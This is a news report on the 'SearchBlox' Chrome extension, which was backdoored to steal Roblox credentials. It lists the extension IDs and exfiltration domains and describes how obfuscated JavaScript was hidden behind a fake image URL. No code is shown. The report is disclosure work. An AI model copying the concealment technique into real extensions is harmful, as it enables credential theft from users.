Backdoored Chrome extension installed by 200,000 Roblox players

Chrome browser extension 'SearchBlox' installed by more than 200,000 users has been discovered to contain a backdoor that can steal your Roblox credentials and assets.

BleepingComputer has been able to analyze the extension code which indicates the presence of a backdoor, introduced either intentionally by its developer or after a compromise.

Chrome extension targets Roblox players

The 'SearchBlox' extensions found on the Chrome Web Store appear to be compromised, BleepingCompuer has observed.

There are two search results for 'SearchBlox' on Chrome. These extensions claim to let you "search Roblox servers for a desired player... blazingly fast" but both contained the backdoor.

The IDs of these unsafe extensions are:

• blddohgncmehcepnokognejaaahehncd
• ccjalhebkdogpobnbdhfpincfeohonni

Early morning hours of Wednesday, suspicions arose among the Roblox community members of SearchBlox containing malware.

"Popular plug-in SearchBlox has been COMPROMISED / BACKDOORED - if you have it, your account may be at risk," tweeted RTC, an unofficial Roblox news and community account.

"Please change your passwords if you have it - and credentials, so that way your account is secure again."

We downloaded the Chrome extension for analysis and for the first extension (blddohgncmehcepnokognejaaahehncd) downloaded by over 200,000 users, the backdoor exists on line 3 of the 'content.js' file:

For the second extension (ccjalhebkdogpobnbdhfpincfeohonni) with just 959 downloads, the backdoor resided within the 'button.js' file.

The offending URL in either case is:

As if the URL structure 'image.png/image.txt' itself wasn't already interesting, the page contains HTML code that pretends to display an image using the '<img>' tag, but instead loads obfuscated JavaScript that is further encoded as HTML character entities (using the '&' and '#' symbols):

The code when decoded yields obfuscated code which further appears to be exfiltrating Roblox credentials to another domain: releasethen.site.

Of note is the fact that both 'searchblox.site' and 'releasethen.site' were registered this month and share a common web host, Hostinger.

The code also appears to survey a player's profile on Rolimons.com, a Roblox trading platform.

'SearchBlox' a repeat offender

Unfortunately, it doesn't seem like the first time a malicious 'SearchBlox' extension has targeted Roblox users either.

In October, Google reportedly took down another 'SearchBlox' sitting on the Chrome Web Store since at least Jun 28th, 2022.

As to whether the backdoor was injected in the extension after compromise by a threat actor or introduced intentionally by the developer is something that's yet to be authoritatively determined.

There is some speculation among Roblox community members [1, 2, 3, 4] who have noticed the inventory of user 'Unstoppablelucent', purportedly the extension's developer, multiply overnight whereas Roblox user 'ccfont' has been terminated today over suspicious inventory trades.

After around a year or so with the plugin being up, he decided that it would be time to put malicious code into the plugin after 200k+ users have downloaded it and try to hack into as many accounts as he could.

— Utiba (@UtibaOfficial) November 23, 2022

Both the extension as well as the offending URLs have a clean VirusTotal reputation at the time of writing, making detection of these malicious extensions a whole lot harder.

Suffice to say, anyone who has installed 'SearchBlox' should remove the extension immediately, clear their cookies and change their passwords for Roblox, and other websites they may have logged into while the extension was in use.

BleepingComputer notified Google of the malicious extensions prior to publishing. A Google spokesperson later confirmed that these extensions were taken down and will automatically be removed from systems where these were installed.

"The identified malicious extensions are no longer available on the Chrome Web Store," Google told BleepingComputer.

"The extensions are blocklisted and will be automatically removed from any user machine that previously downloaded them."

Updates:

Nov 23, 2022 12:24 PM ET: Added statement from Google received hours after publication.

Nov 26, 2022 11:36 PM ET: Removed references to Rolimons that are not applicable.